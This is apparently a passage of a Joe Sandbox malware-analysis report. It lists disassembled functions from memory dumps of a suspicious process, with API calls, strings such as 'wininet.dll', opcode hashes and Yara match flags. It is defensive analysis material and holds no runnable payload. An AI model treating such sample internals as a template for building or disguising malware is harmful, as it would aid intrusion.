                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 47b08f16de1b7fab59002f9ed3c110ea6462c4044ca3eb801ddac04acc9022e1
                                                                                                                            • Instruction ID: fb5ad0d89f4247988c0b13f0c217d7973481923ccc3b8bc10d0c4b38f18f9ef4
                                                                                                                            • Opcode Fuzzy Hash: 47b08f16de1b7fab59002f9ed3c110ea6462c4044ca3eb801ddac04acc9022e1
                                                                                                                            • Instruction Fuzzy Hash: 3990043D37140403010DF55C07445071047C7D7351355C031F1015D50CD731CD715135
                                                                                                                            Function 03302F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 7d3fd3213c103bc18af3d394e12183339c99e05e7301d9de3b9f4f44e5d66a4c
                                                                                                                            • Instruction ID: 2941cdb1d04b367250fb8ac46d5243678fbdf1065c19676c71971d71d43bbd3b
                                                                                                                            • Opcode Fuzzy Hash: 7d3fd3213c103bc18af3d394e12183339c99e05e7301d9de3b9f4f44e5d66a4c
                                                                                                                            • Instruction Fuzzy Hash: 6F90026539140843D104B15C4454B061005C7E2301F55C015E1064954DC719CD62612A
                                                                                                                            Function 03302FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 7a1b215b61fd260587fdc8bb200a97a25c5e791d41f1eb834bbd255713a901f6
                                                                                                                            • Instruction ID: 058a6d856d8ae504850775f232697513940934bfae68b3fd172493e85957e257
                                                                                                                            • Opcode Fuzzy Hash: 7a1b215b61fd260587fdc8bb200a97a25c5e791d41f1eb834bbd255713a901f6
                                                                                                                            • Instruction Fuzzy Hash: E6900225651404434144B16C88849065005ABE2211755C121A0998950DC75989755669
                                                                                                                            Function 03302FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 21efd6717fa6fc4be7483942bd2b7369f25f6e9c19f357ddd6ce872aa7cab70f
                                                                                                                            • Instruction ID: d001b4b14583f872b2a20256c47af7807024128dae14262ed3c059d30b741321
                                                                                                                            • Opcode Fuzzy Hash: 21efd6717fa6fc4be7483942bd2b7369f25f6e9c19f357ddd6ce872aa7cab70f
                                                                                                                            • Instruction Fuzzy Hash: 30900225261C0443D204B56C4C54B07100587D1303F55C115A0154954CCB1589715525
                                                                                                                            Function 03302E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: a42c3de95b4fd818a7b81dcb5afc4cd49b4f73ad44c876646487bde4bee81fa0
                                                                                                                            • Instruction ID: d009233eee13d1efad465a138e8f6fcd7a90dfb311ea2f6d306ce72265cf55e0
                                                                                                                            • Opcode Fuzzy Hash: a42c3de95b4fd818a7b81dcb5afc4cd49b4f73ad44c876646487bde4bee81fa0
                                                                                                                            • Instruction Fuzzy Hash: 7390022565140903D105B15C4444616100A87D1241F95C022A1024955ECB258AA2A135
                                                                                                                            Function 03302EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: e7685b884a6040b129a731f799a54aa0363b57136e7c131d002f41f628030ee0
                                                                                                                            • Instruction ID: 9934fa1509d0003bfb336742634ec596fcef16c95b7969866dc8d16d78e57ef9
                                                                                                                            • Opcode Fuzzy Hash: e7685b884a6040b129a731f799a54aa0363b57136e7c131d002f41f628030ee0
                                                                                                                            • Instruction Fuzzy Hash: C190026525180803D144B55C4844607100587D1302F55C011A2064955ECB298D616139
                                                                                                                            Function 03302D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 5b5e93796b717c6ae63c5f36477f1a60b3000a5478e3bc9ebaa17916e523edf2
                                                                                                                            • Instruction ID: d9db28c870dba3d201fa33f32febc7e54e8bf61e6f93e3425d67931ad85a70c4
                                                                                                                            • Opcode Fuzzy Hash: 5b5e93796b717c6ae63c5f36477f1a60b3000a5478e3bc9ebaa17916e523edf2
                                                                                                                            • Instruction Fuzzy Hash: 6B90022535140403D144B15C54586065005D7E2301F55D011E0414954CDB1589665226
                                                                                                                            Function 03302D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 1067f092a79bef21b0583bd36ca8d17201ce9ff1911b543958bbafe1a659903d
                                                                                                                            • Instruction ID: 86df39ac047617f56cd947630adf49cb4998cb356ebf92399d9c2024e058dde8
                                                                                                                            • Opcode Fuzzy Hash: 1067f092a79bef21b0583bd36ca8d17201ce9ff1911b543958bbafe1a659903d
                                                                                                                            • Instruction Fuzzy Hash: 4C90022D26340403D184B15C544860A100587D2202F95D415A0015958CCB1589795325
                                                                                                                            Function 03302DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 826f60b5fdb472dc6e7aa02c5aa5620fb5ca31f624fa440f8c1bc9aa24f7d5d9
                                                                                                                            • Instruction ID: 9a8279dbab8066714717610447e39cb7fa1e9b15bb1ae5f88b75aa2c63a16d5b
                                                                                                                            • Opcode Fuzzy Hash: 826f60b5fdb472dc6e7aa02c5aa5620fb5ca31f624fa440f8c1bc9aa24f7d5d9
                                                                                                                            • Instruction Fuzzy Hash: B590023525140813D115B15C4544707100987D1241F95C412A0424958DD7568A62A125
                                                                                                                            Function 03302DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 8e942a617539477bc2ddd2f4827828c53afddde5865b9439d5f3e71b81bd55aa
                                                                                                                            • Instruction ID: 7a511db7b070af44a36d1cd3cce80f786f72e2ab009f9c9ecd5a5783334d8f27
                                                                                                                            • Opcode Fuzzy Hash: 8e942a617539477bc2ddd2f4827828c53afddde5865b9439d5f3e71b81bd55aa
                                                                                                                            • Instruction Fuzzy Hash: F8900225292445535549F15C4444507500697E1241795C012A1414D50CC7269966D625
                                                                                                                            Function 03302C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 72c26c9ac2cfee833888fb48917b5c0e50e99ba5d82cf72f48b5490e99713d42
                                                                                                                            • Instruction ID: 661f55c8ca2163426714e0a189264a5a9edde1de701d91a73aed557014150777
                                                                                                                            • Opcode Fuzzy Hash: 72c26c9ac2cfee833888fb48917b5c0e50e99ba5d82cf72f48b5490e99713d42
                                                                                                                            • Instruction Fuzzy Hash: 3190023525148C03D114B15C844474A100587D1301F59C411A4424A58DC79589A17125
                                                                                                                            Function 03302C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 209614083950aa3925b194c1ebf735b833789e6c8e8d22fd981e538b70761482
                                                                                                                            • Instruction ID: 3cee2c061706fbaa9bb54c9aa5ee796c5ee5aa15db95f92acfe7c752c5f8951a
                                                                                                                            • Opcode Fuzzy Hash: 209614083950aa3925b194c1ebf735b833789e6c8e8d22fd981e538b70761482
                                                                                                                            • Instruction Fuzzy Hash: 4B90023525140C43D104B15C4444B46100587E1301F55C016A0124A54DC715C9617525
                                                                                                                            Function 03302CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: e9d6ae32797505b6bfd51a9dd0311b817d2ccac2fdb2290415e4c7eb1330ae40
                                                                                                                            • Instruction ID: 892f078c948122abf0ec893ac0f87ebea2899672b2fd95314c384a096bfe22ac
                                                                                                                            • Opcode Fuzzy Hash: e9d6ae32797505b6bfd51a9dd0311b817d2ccac2fdb2290415e4c7eb1330ae40
                                                                                                                            • Instruction Fuzzy Hash: 3C90023525140803D104B59C5448646100587E1301F55D011A5024955EC76589A16135
                                                                                                                            Function 033035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: dc1d3954610e2b3afacb46020a57471488a48dd7ab7d6a3cc132582909d1c535
                                                                                                                            • Instruction ID: 56a84d012db012981ea86b28ae92cfd23b52cd5a6cfd594ce6df7ca302614bdb
                                                                                                                            • Opcode Fuzzy Hash: dc1d3954610e2b3afacb46020a57471488a48dd7ab7d6a3cc132582909d1c535
                                                                                                                            • Instruction Fuzzy Hash: 7890023565550803D104B15C4554706200587D1201F65C411A0424968DC7958A6165A6
                                                                                                                            Function 033039B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: c6e627ddbf7081ab907aa436689e239ba7d584451654118e87d74116310857af
                                                                                                                            • Instruction ID: dd755dd673d71c3b0ba3b7dc5aec8572395a430177807f2c333dfa21dfe87c73
                                                                                                                            • Opcode Fuzzy Hash: c6e627ddbf7081ab907aa436689e239ba7d584451654118e87d74116310857af
                                                                                                                            • Instruction Fuzzy Hash: 8F90022529545503D154B15C44446165005A7E1201F55C021A0814994DC75589656225
                                                                                                                            Function 00AA0DC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 578 aa0dc0-aa0e2a call abb610 call abc020 call aa4570 call a91410 call ab1c70 589 aa0e4a-aa0e50 578->589 590 aa0e2c-aa0e3b PostThreadMessageW 578->590 590->589 591 aa0e3d-aa0e47 590->591 591->589
                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(-4108694,00000111,00000000,00000000), ref: 00AA0E37
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePostThread
                                                                                                                            • String ID: -4108694$-4108694
                                                                                                                            • API String ID: 1836367815-789369925
                                                                                                                            • Opcode ID: 630658a22188ba26b85cbe305afc29655713d8078256a20e6728a0127b82ae18
                                                                                                                            • Instruction ID: 0575365bc4c9b26c08e57fe948ef2f25895353703ce5dd056e7e4224bd261f7d
                                                                                                                            • Opcode Fuzzy Hash: 630658a22188ba26b85cbe305afc29655713d8078256a20e6728a0127b82ae18
                                                                                                                            • Instruction Fuzzy Hash: 7B01C4B1D4020C7EDB11ABE09C82DEF7B7CDF45794F048064FA0467141D6755E0647B1
                                                                                                                            Function 00AB3AA0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(000007D0), ref: 00AB3B7B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID: net.dll$wininet.dll
                                                                                                                            • API String ID: 3472027048-1269752229
                                                                                                                            • Opcode ID: a0f0c6cff8ab3ca3c32de5cee17bd92f0d0773a5a6ad7c69f6b3f814c6071469
                                                                                                                            • Instruction ID: e2dc4dd451d6d06667decc98aa5d0dbdceb045557fd0d4200c33e92e92dd9dba
                                                                                                                            • Opcode Fuzzy Hash: a0f0c6cff8ab3ca3c32de5cee17bd92f0d0773a5a6ad7c69f6b3f814c6071469
                                                                                                                            • Instruction Fuzzy Hash: AE3160B1A01205BBDB14DFA4C885FEABBBDFB88700F148519F51D5B246D7706A44CBA4
                                                                                                                            Function 00AAF52F Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeUninitialize
                                                                                                                            • String ID: @J7<
                                                                                                                            • API String ID: 3442037557-2016760708
                                                                                                                            • Opcode ID: 7a03beab84a75b1469b1daf4eb69f1a4a669412261217e290c4517e6c01e4ddc
                                                                                                                            • Instruction ID: de19033e21cd695887ea17225daa6687138a058d619d0fcdc8ea2e35259d6e96
                                                                                                                            • Opcode Fuzzy Hash: 7a03beab84a75b1469b1daf4eb69f1a4a669412261217e290c4517e6c01e4ddc
                                                                                                                            • Instruction Fuzzy Hash: 75315EB6A0020AAFDB14DFD8D8809EFB7B9FF88304F108559E505EB254D771EE058BA0
                                                                                                                            Function 00AAF530 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeUninitialize
                                                                                                                            • String ID: @J7<
                                                                                                                            • API String ID: 3442037557-2016760708
                                                                                                                            • Opcode ID: 599e94375fd12ecb97e2f4b8d1889a5c76f917e89a0409b6cc35ead2fb38b8ec
                                                                                                                            • Instruction ID: 28c07f21616f30abcabb12afbfae88b793814cc96cfd75efa911645c4e91a582
                                                                                                                            • Opcode Fuzzy Hash: 599e94375fd12ecb97e2f4b8d1889a5c76f917e89a0409b6cc35ead2fb38b8ec
                                                                                                                            • Instruction Fuzzy Hash: 7B315EB6A0020AAFDB14DFD8D8809EFB7B9FF88304B108559E505EB254D771EE058BA0
                                                                                                                            Function 00AA45F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00AA45E2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Load
                                                                                                                            • String ID: axD3
                                                                                                                            • API String ID: 2234796835-3556351365
                                                                                                                            • Opcode ID: 878dfedd390b4e169c5c909b9aebd42986a9202124793dd2abb74fc700858bd0
                                                                                                                            • Instruction ID: e73c4b5c8a0bf54d2aef2a857df22d828ef08b9b0d0af6a73fea83f53d996699
                                                                                                                            • Opcode Fuzzy Hash: 878dfedd390b4e169c5c909b9aebd42986a9202124793dd2abb74fc700858bd0
                                                                                                                            • Instruction Fuzzy Hash: 2B1186B5D0060A6BE700CBA8CC01BDAB7B8DB89718F144228FD159B2C1E7B0E906C791
                                                                                                                            Function 00AA8199 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00AA1D50,00AB7FCE,00AB568F,00AA1D13), ref: 00AA8193
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: a700d42c835ce2977903810198fec52443f9cf3e02a7cad405b17eeed7dfaeee
                                                                                                                            • Instruction ID: e30edf70917686ed1ddf81fb380544930d43ecd78e5e402d64f97a209b4a20c1
                                                                                                                            • Opcode Fuzzy Hash: a700d42c835ce2977903810198fec52443f9cf3e02a7cad405b17eeed7dfaeee
                                                                                                                            • Instruction Fuzzy Hash: D71106729443047FEB10EBA0CD4AFAA777C9B45310F044299F808AB1D3EBB9595487A5
                                                                                                                            Function 00AA4570 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00AA45E2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Load
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2234796835-0
                                                                                                                            • Opcode ID: 796422a0e03da6e05e870b9df345f99345e8cc58a3a3a3b03bc6c72230115a90
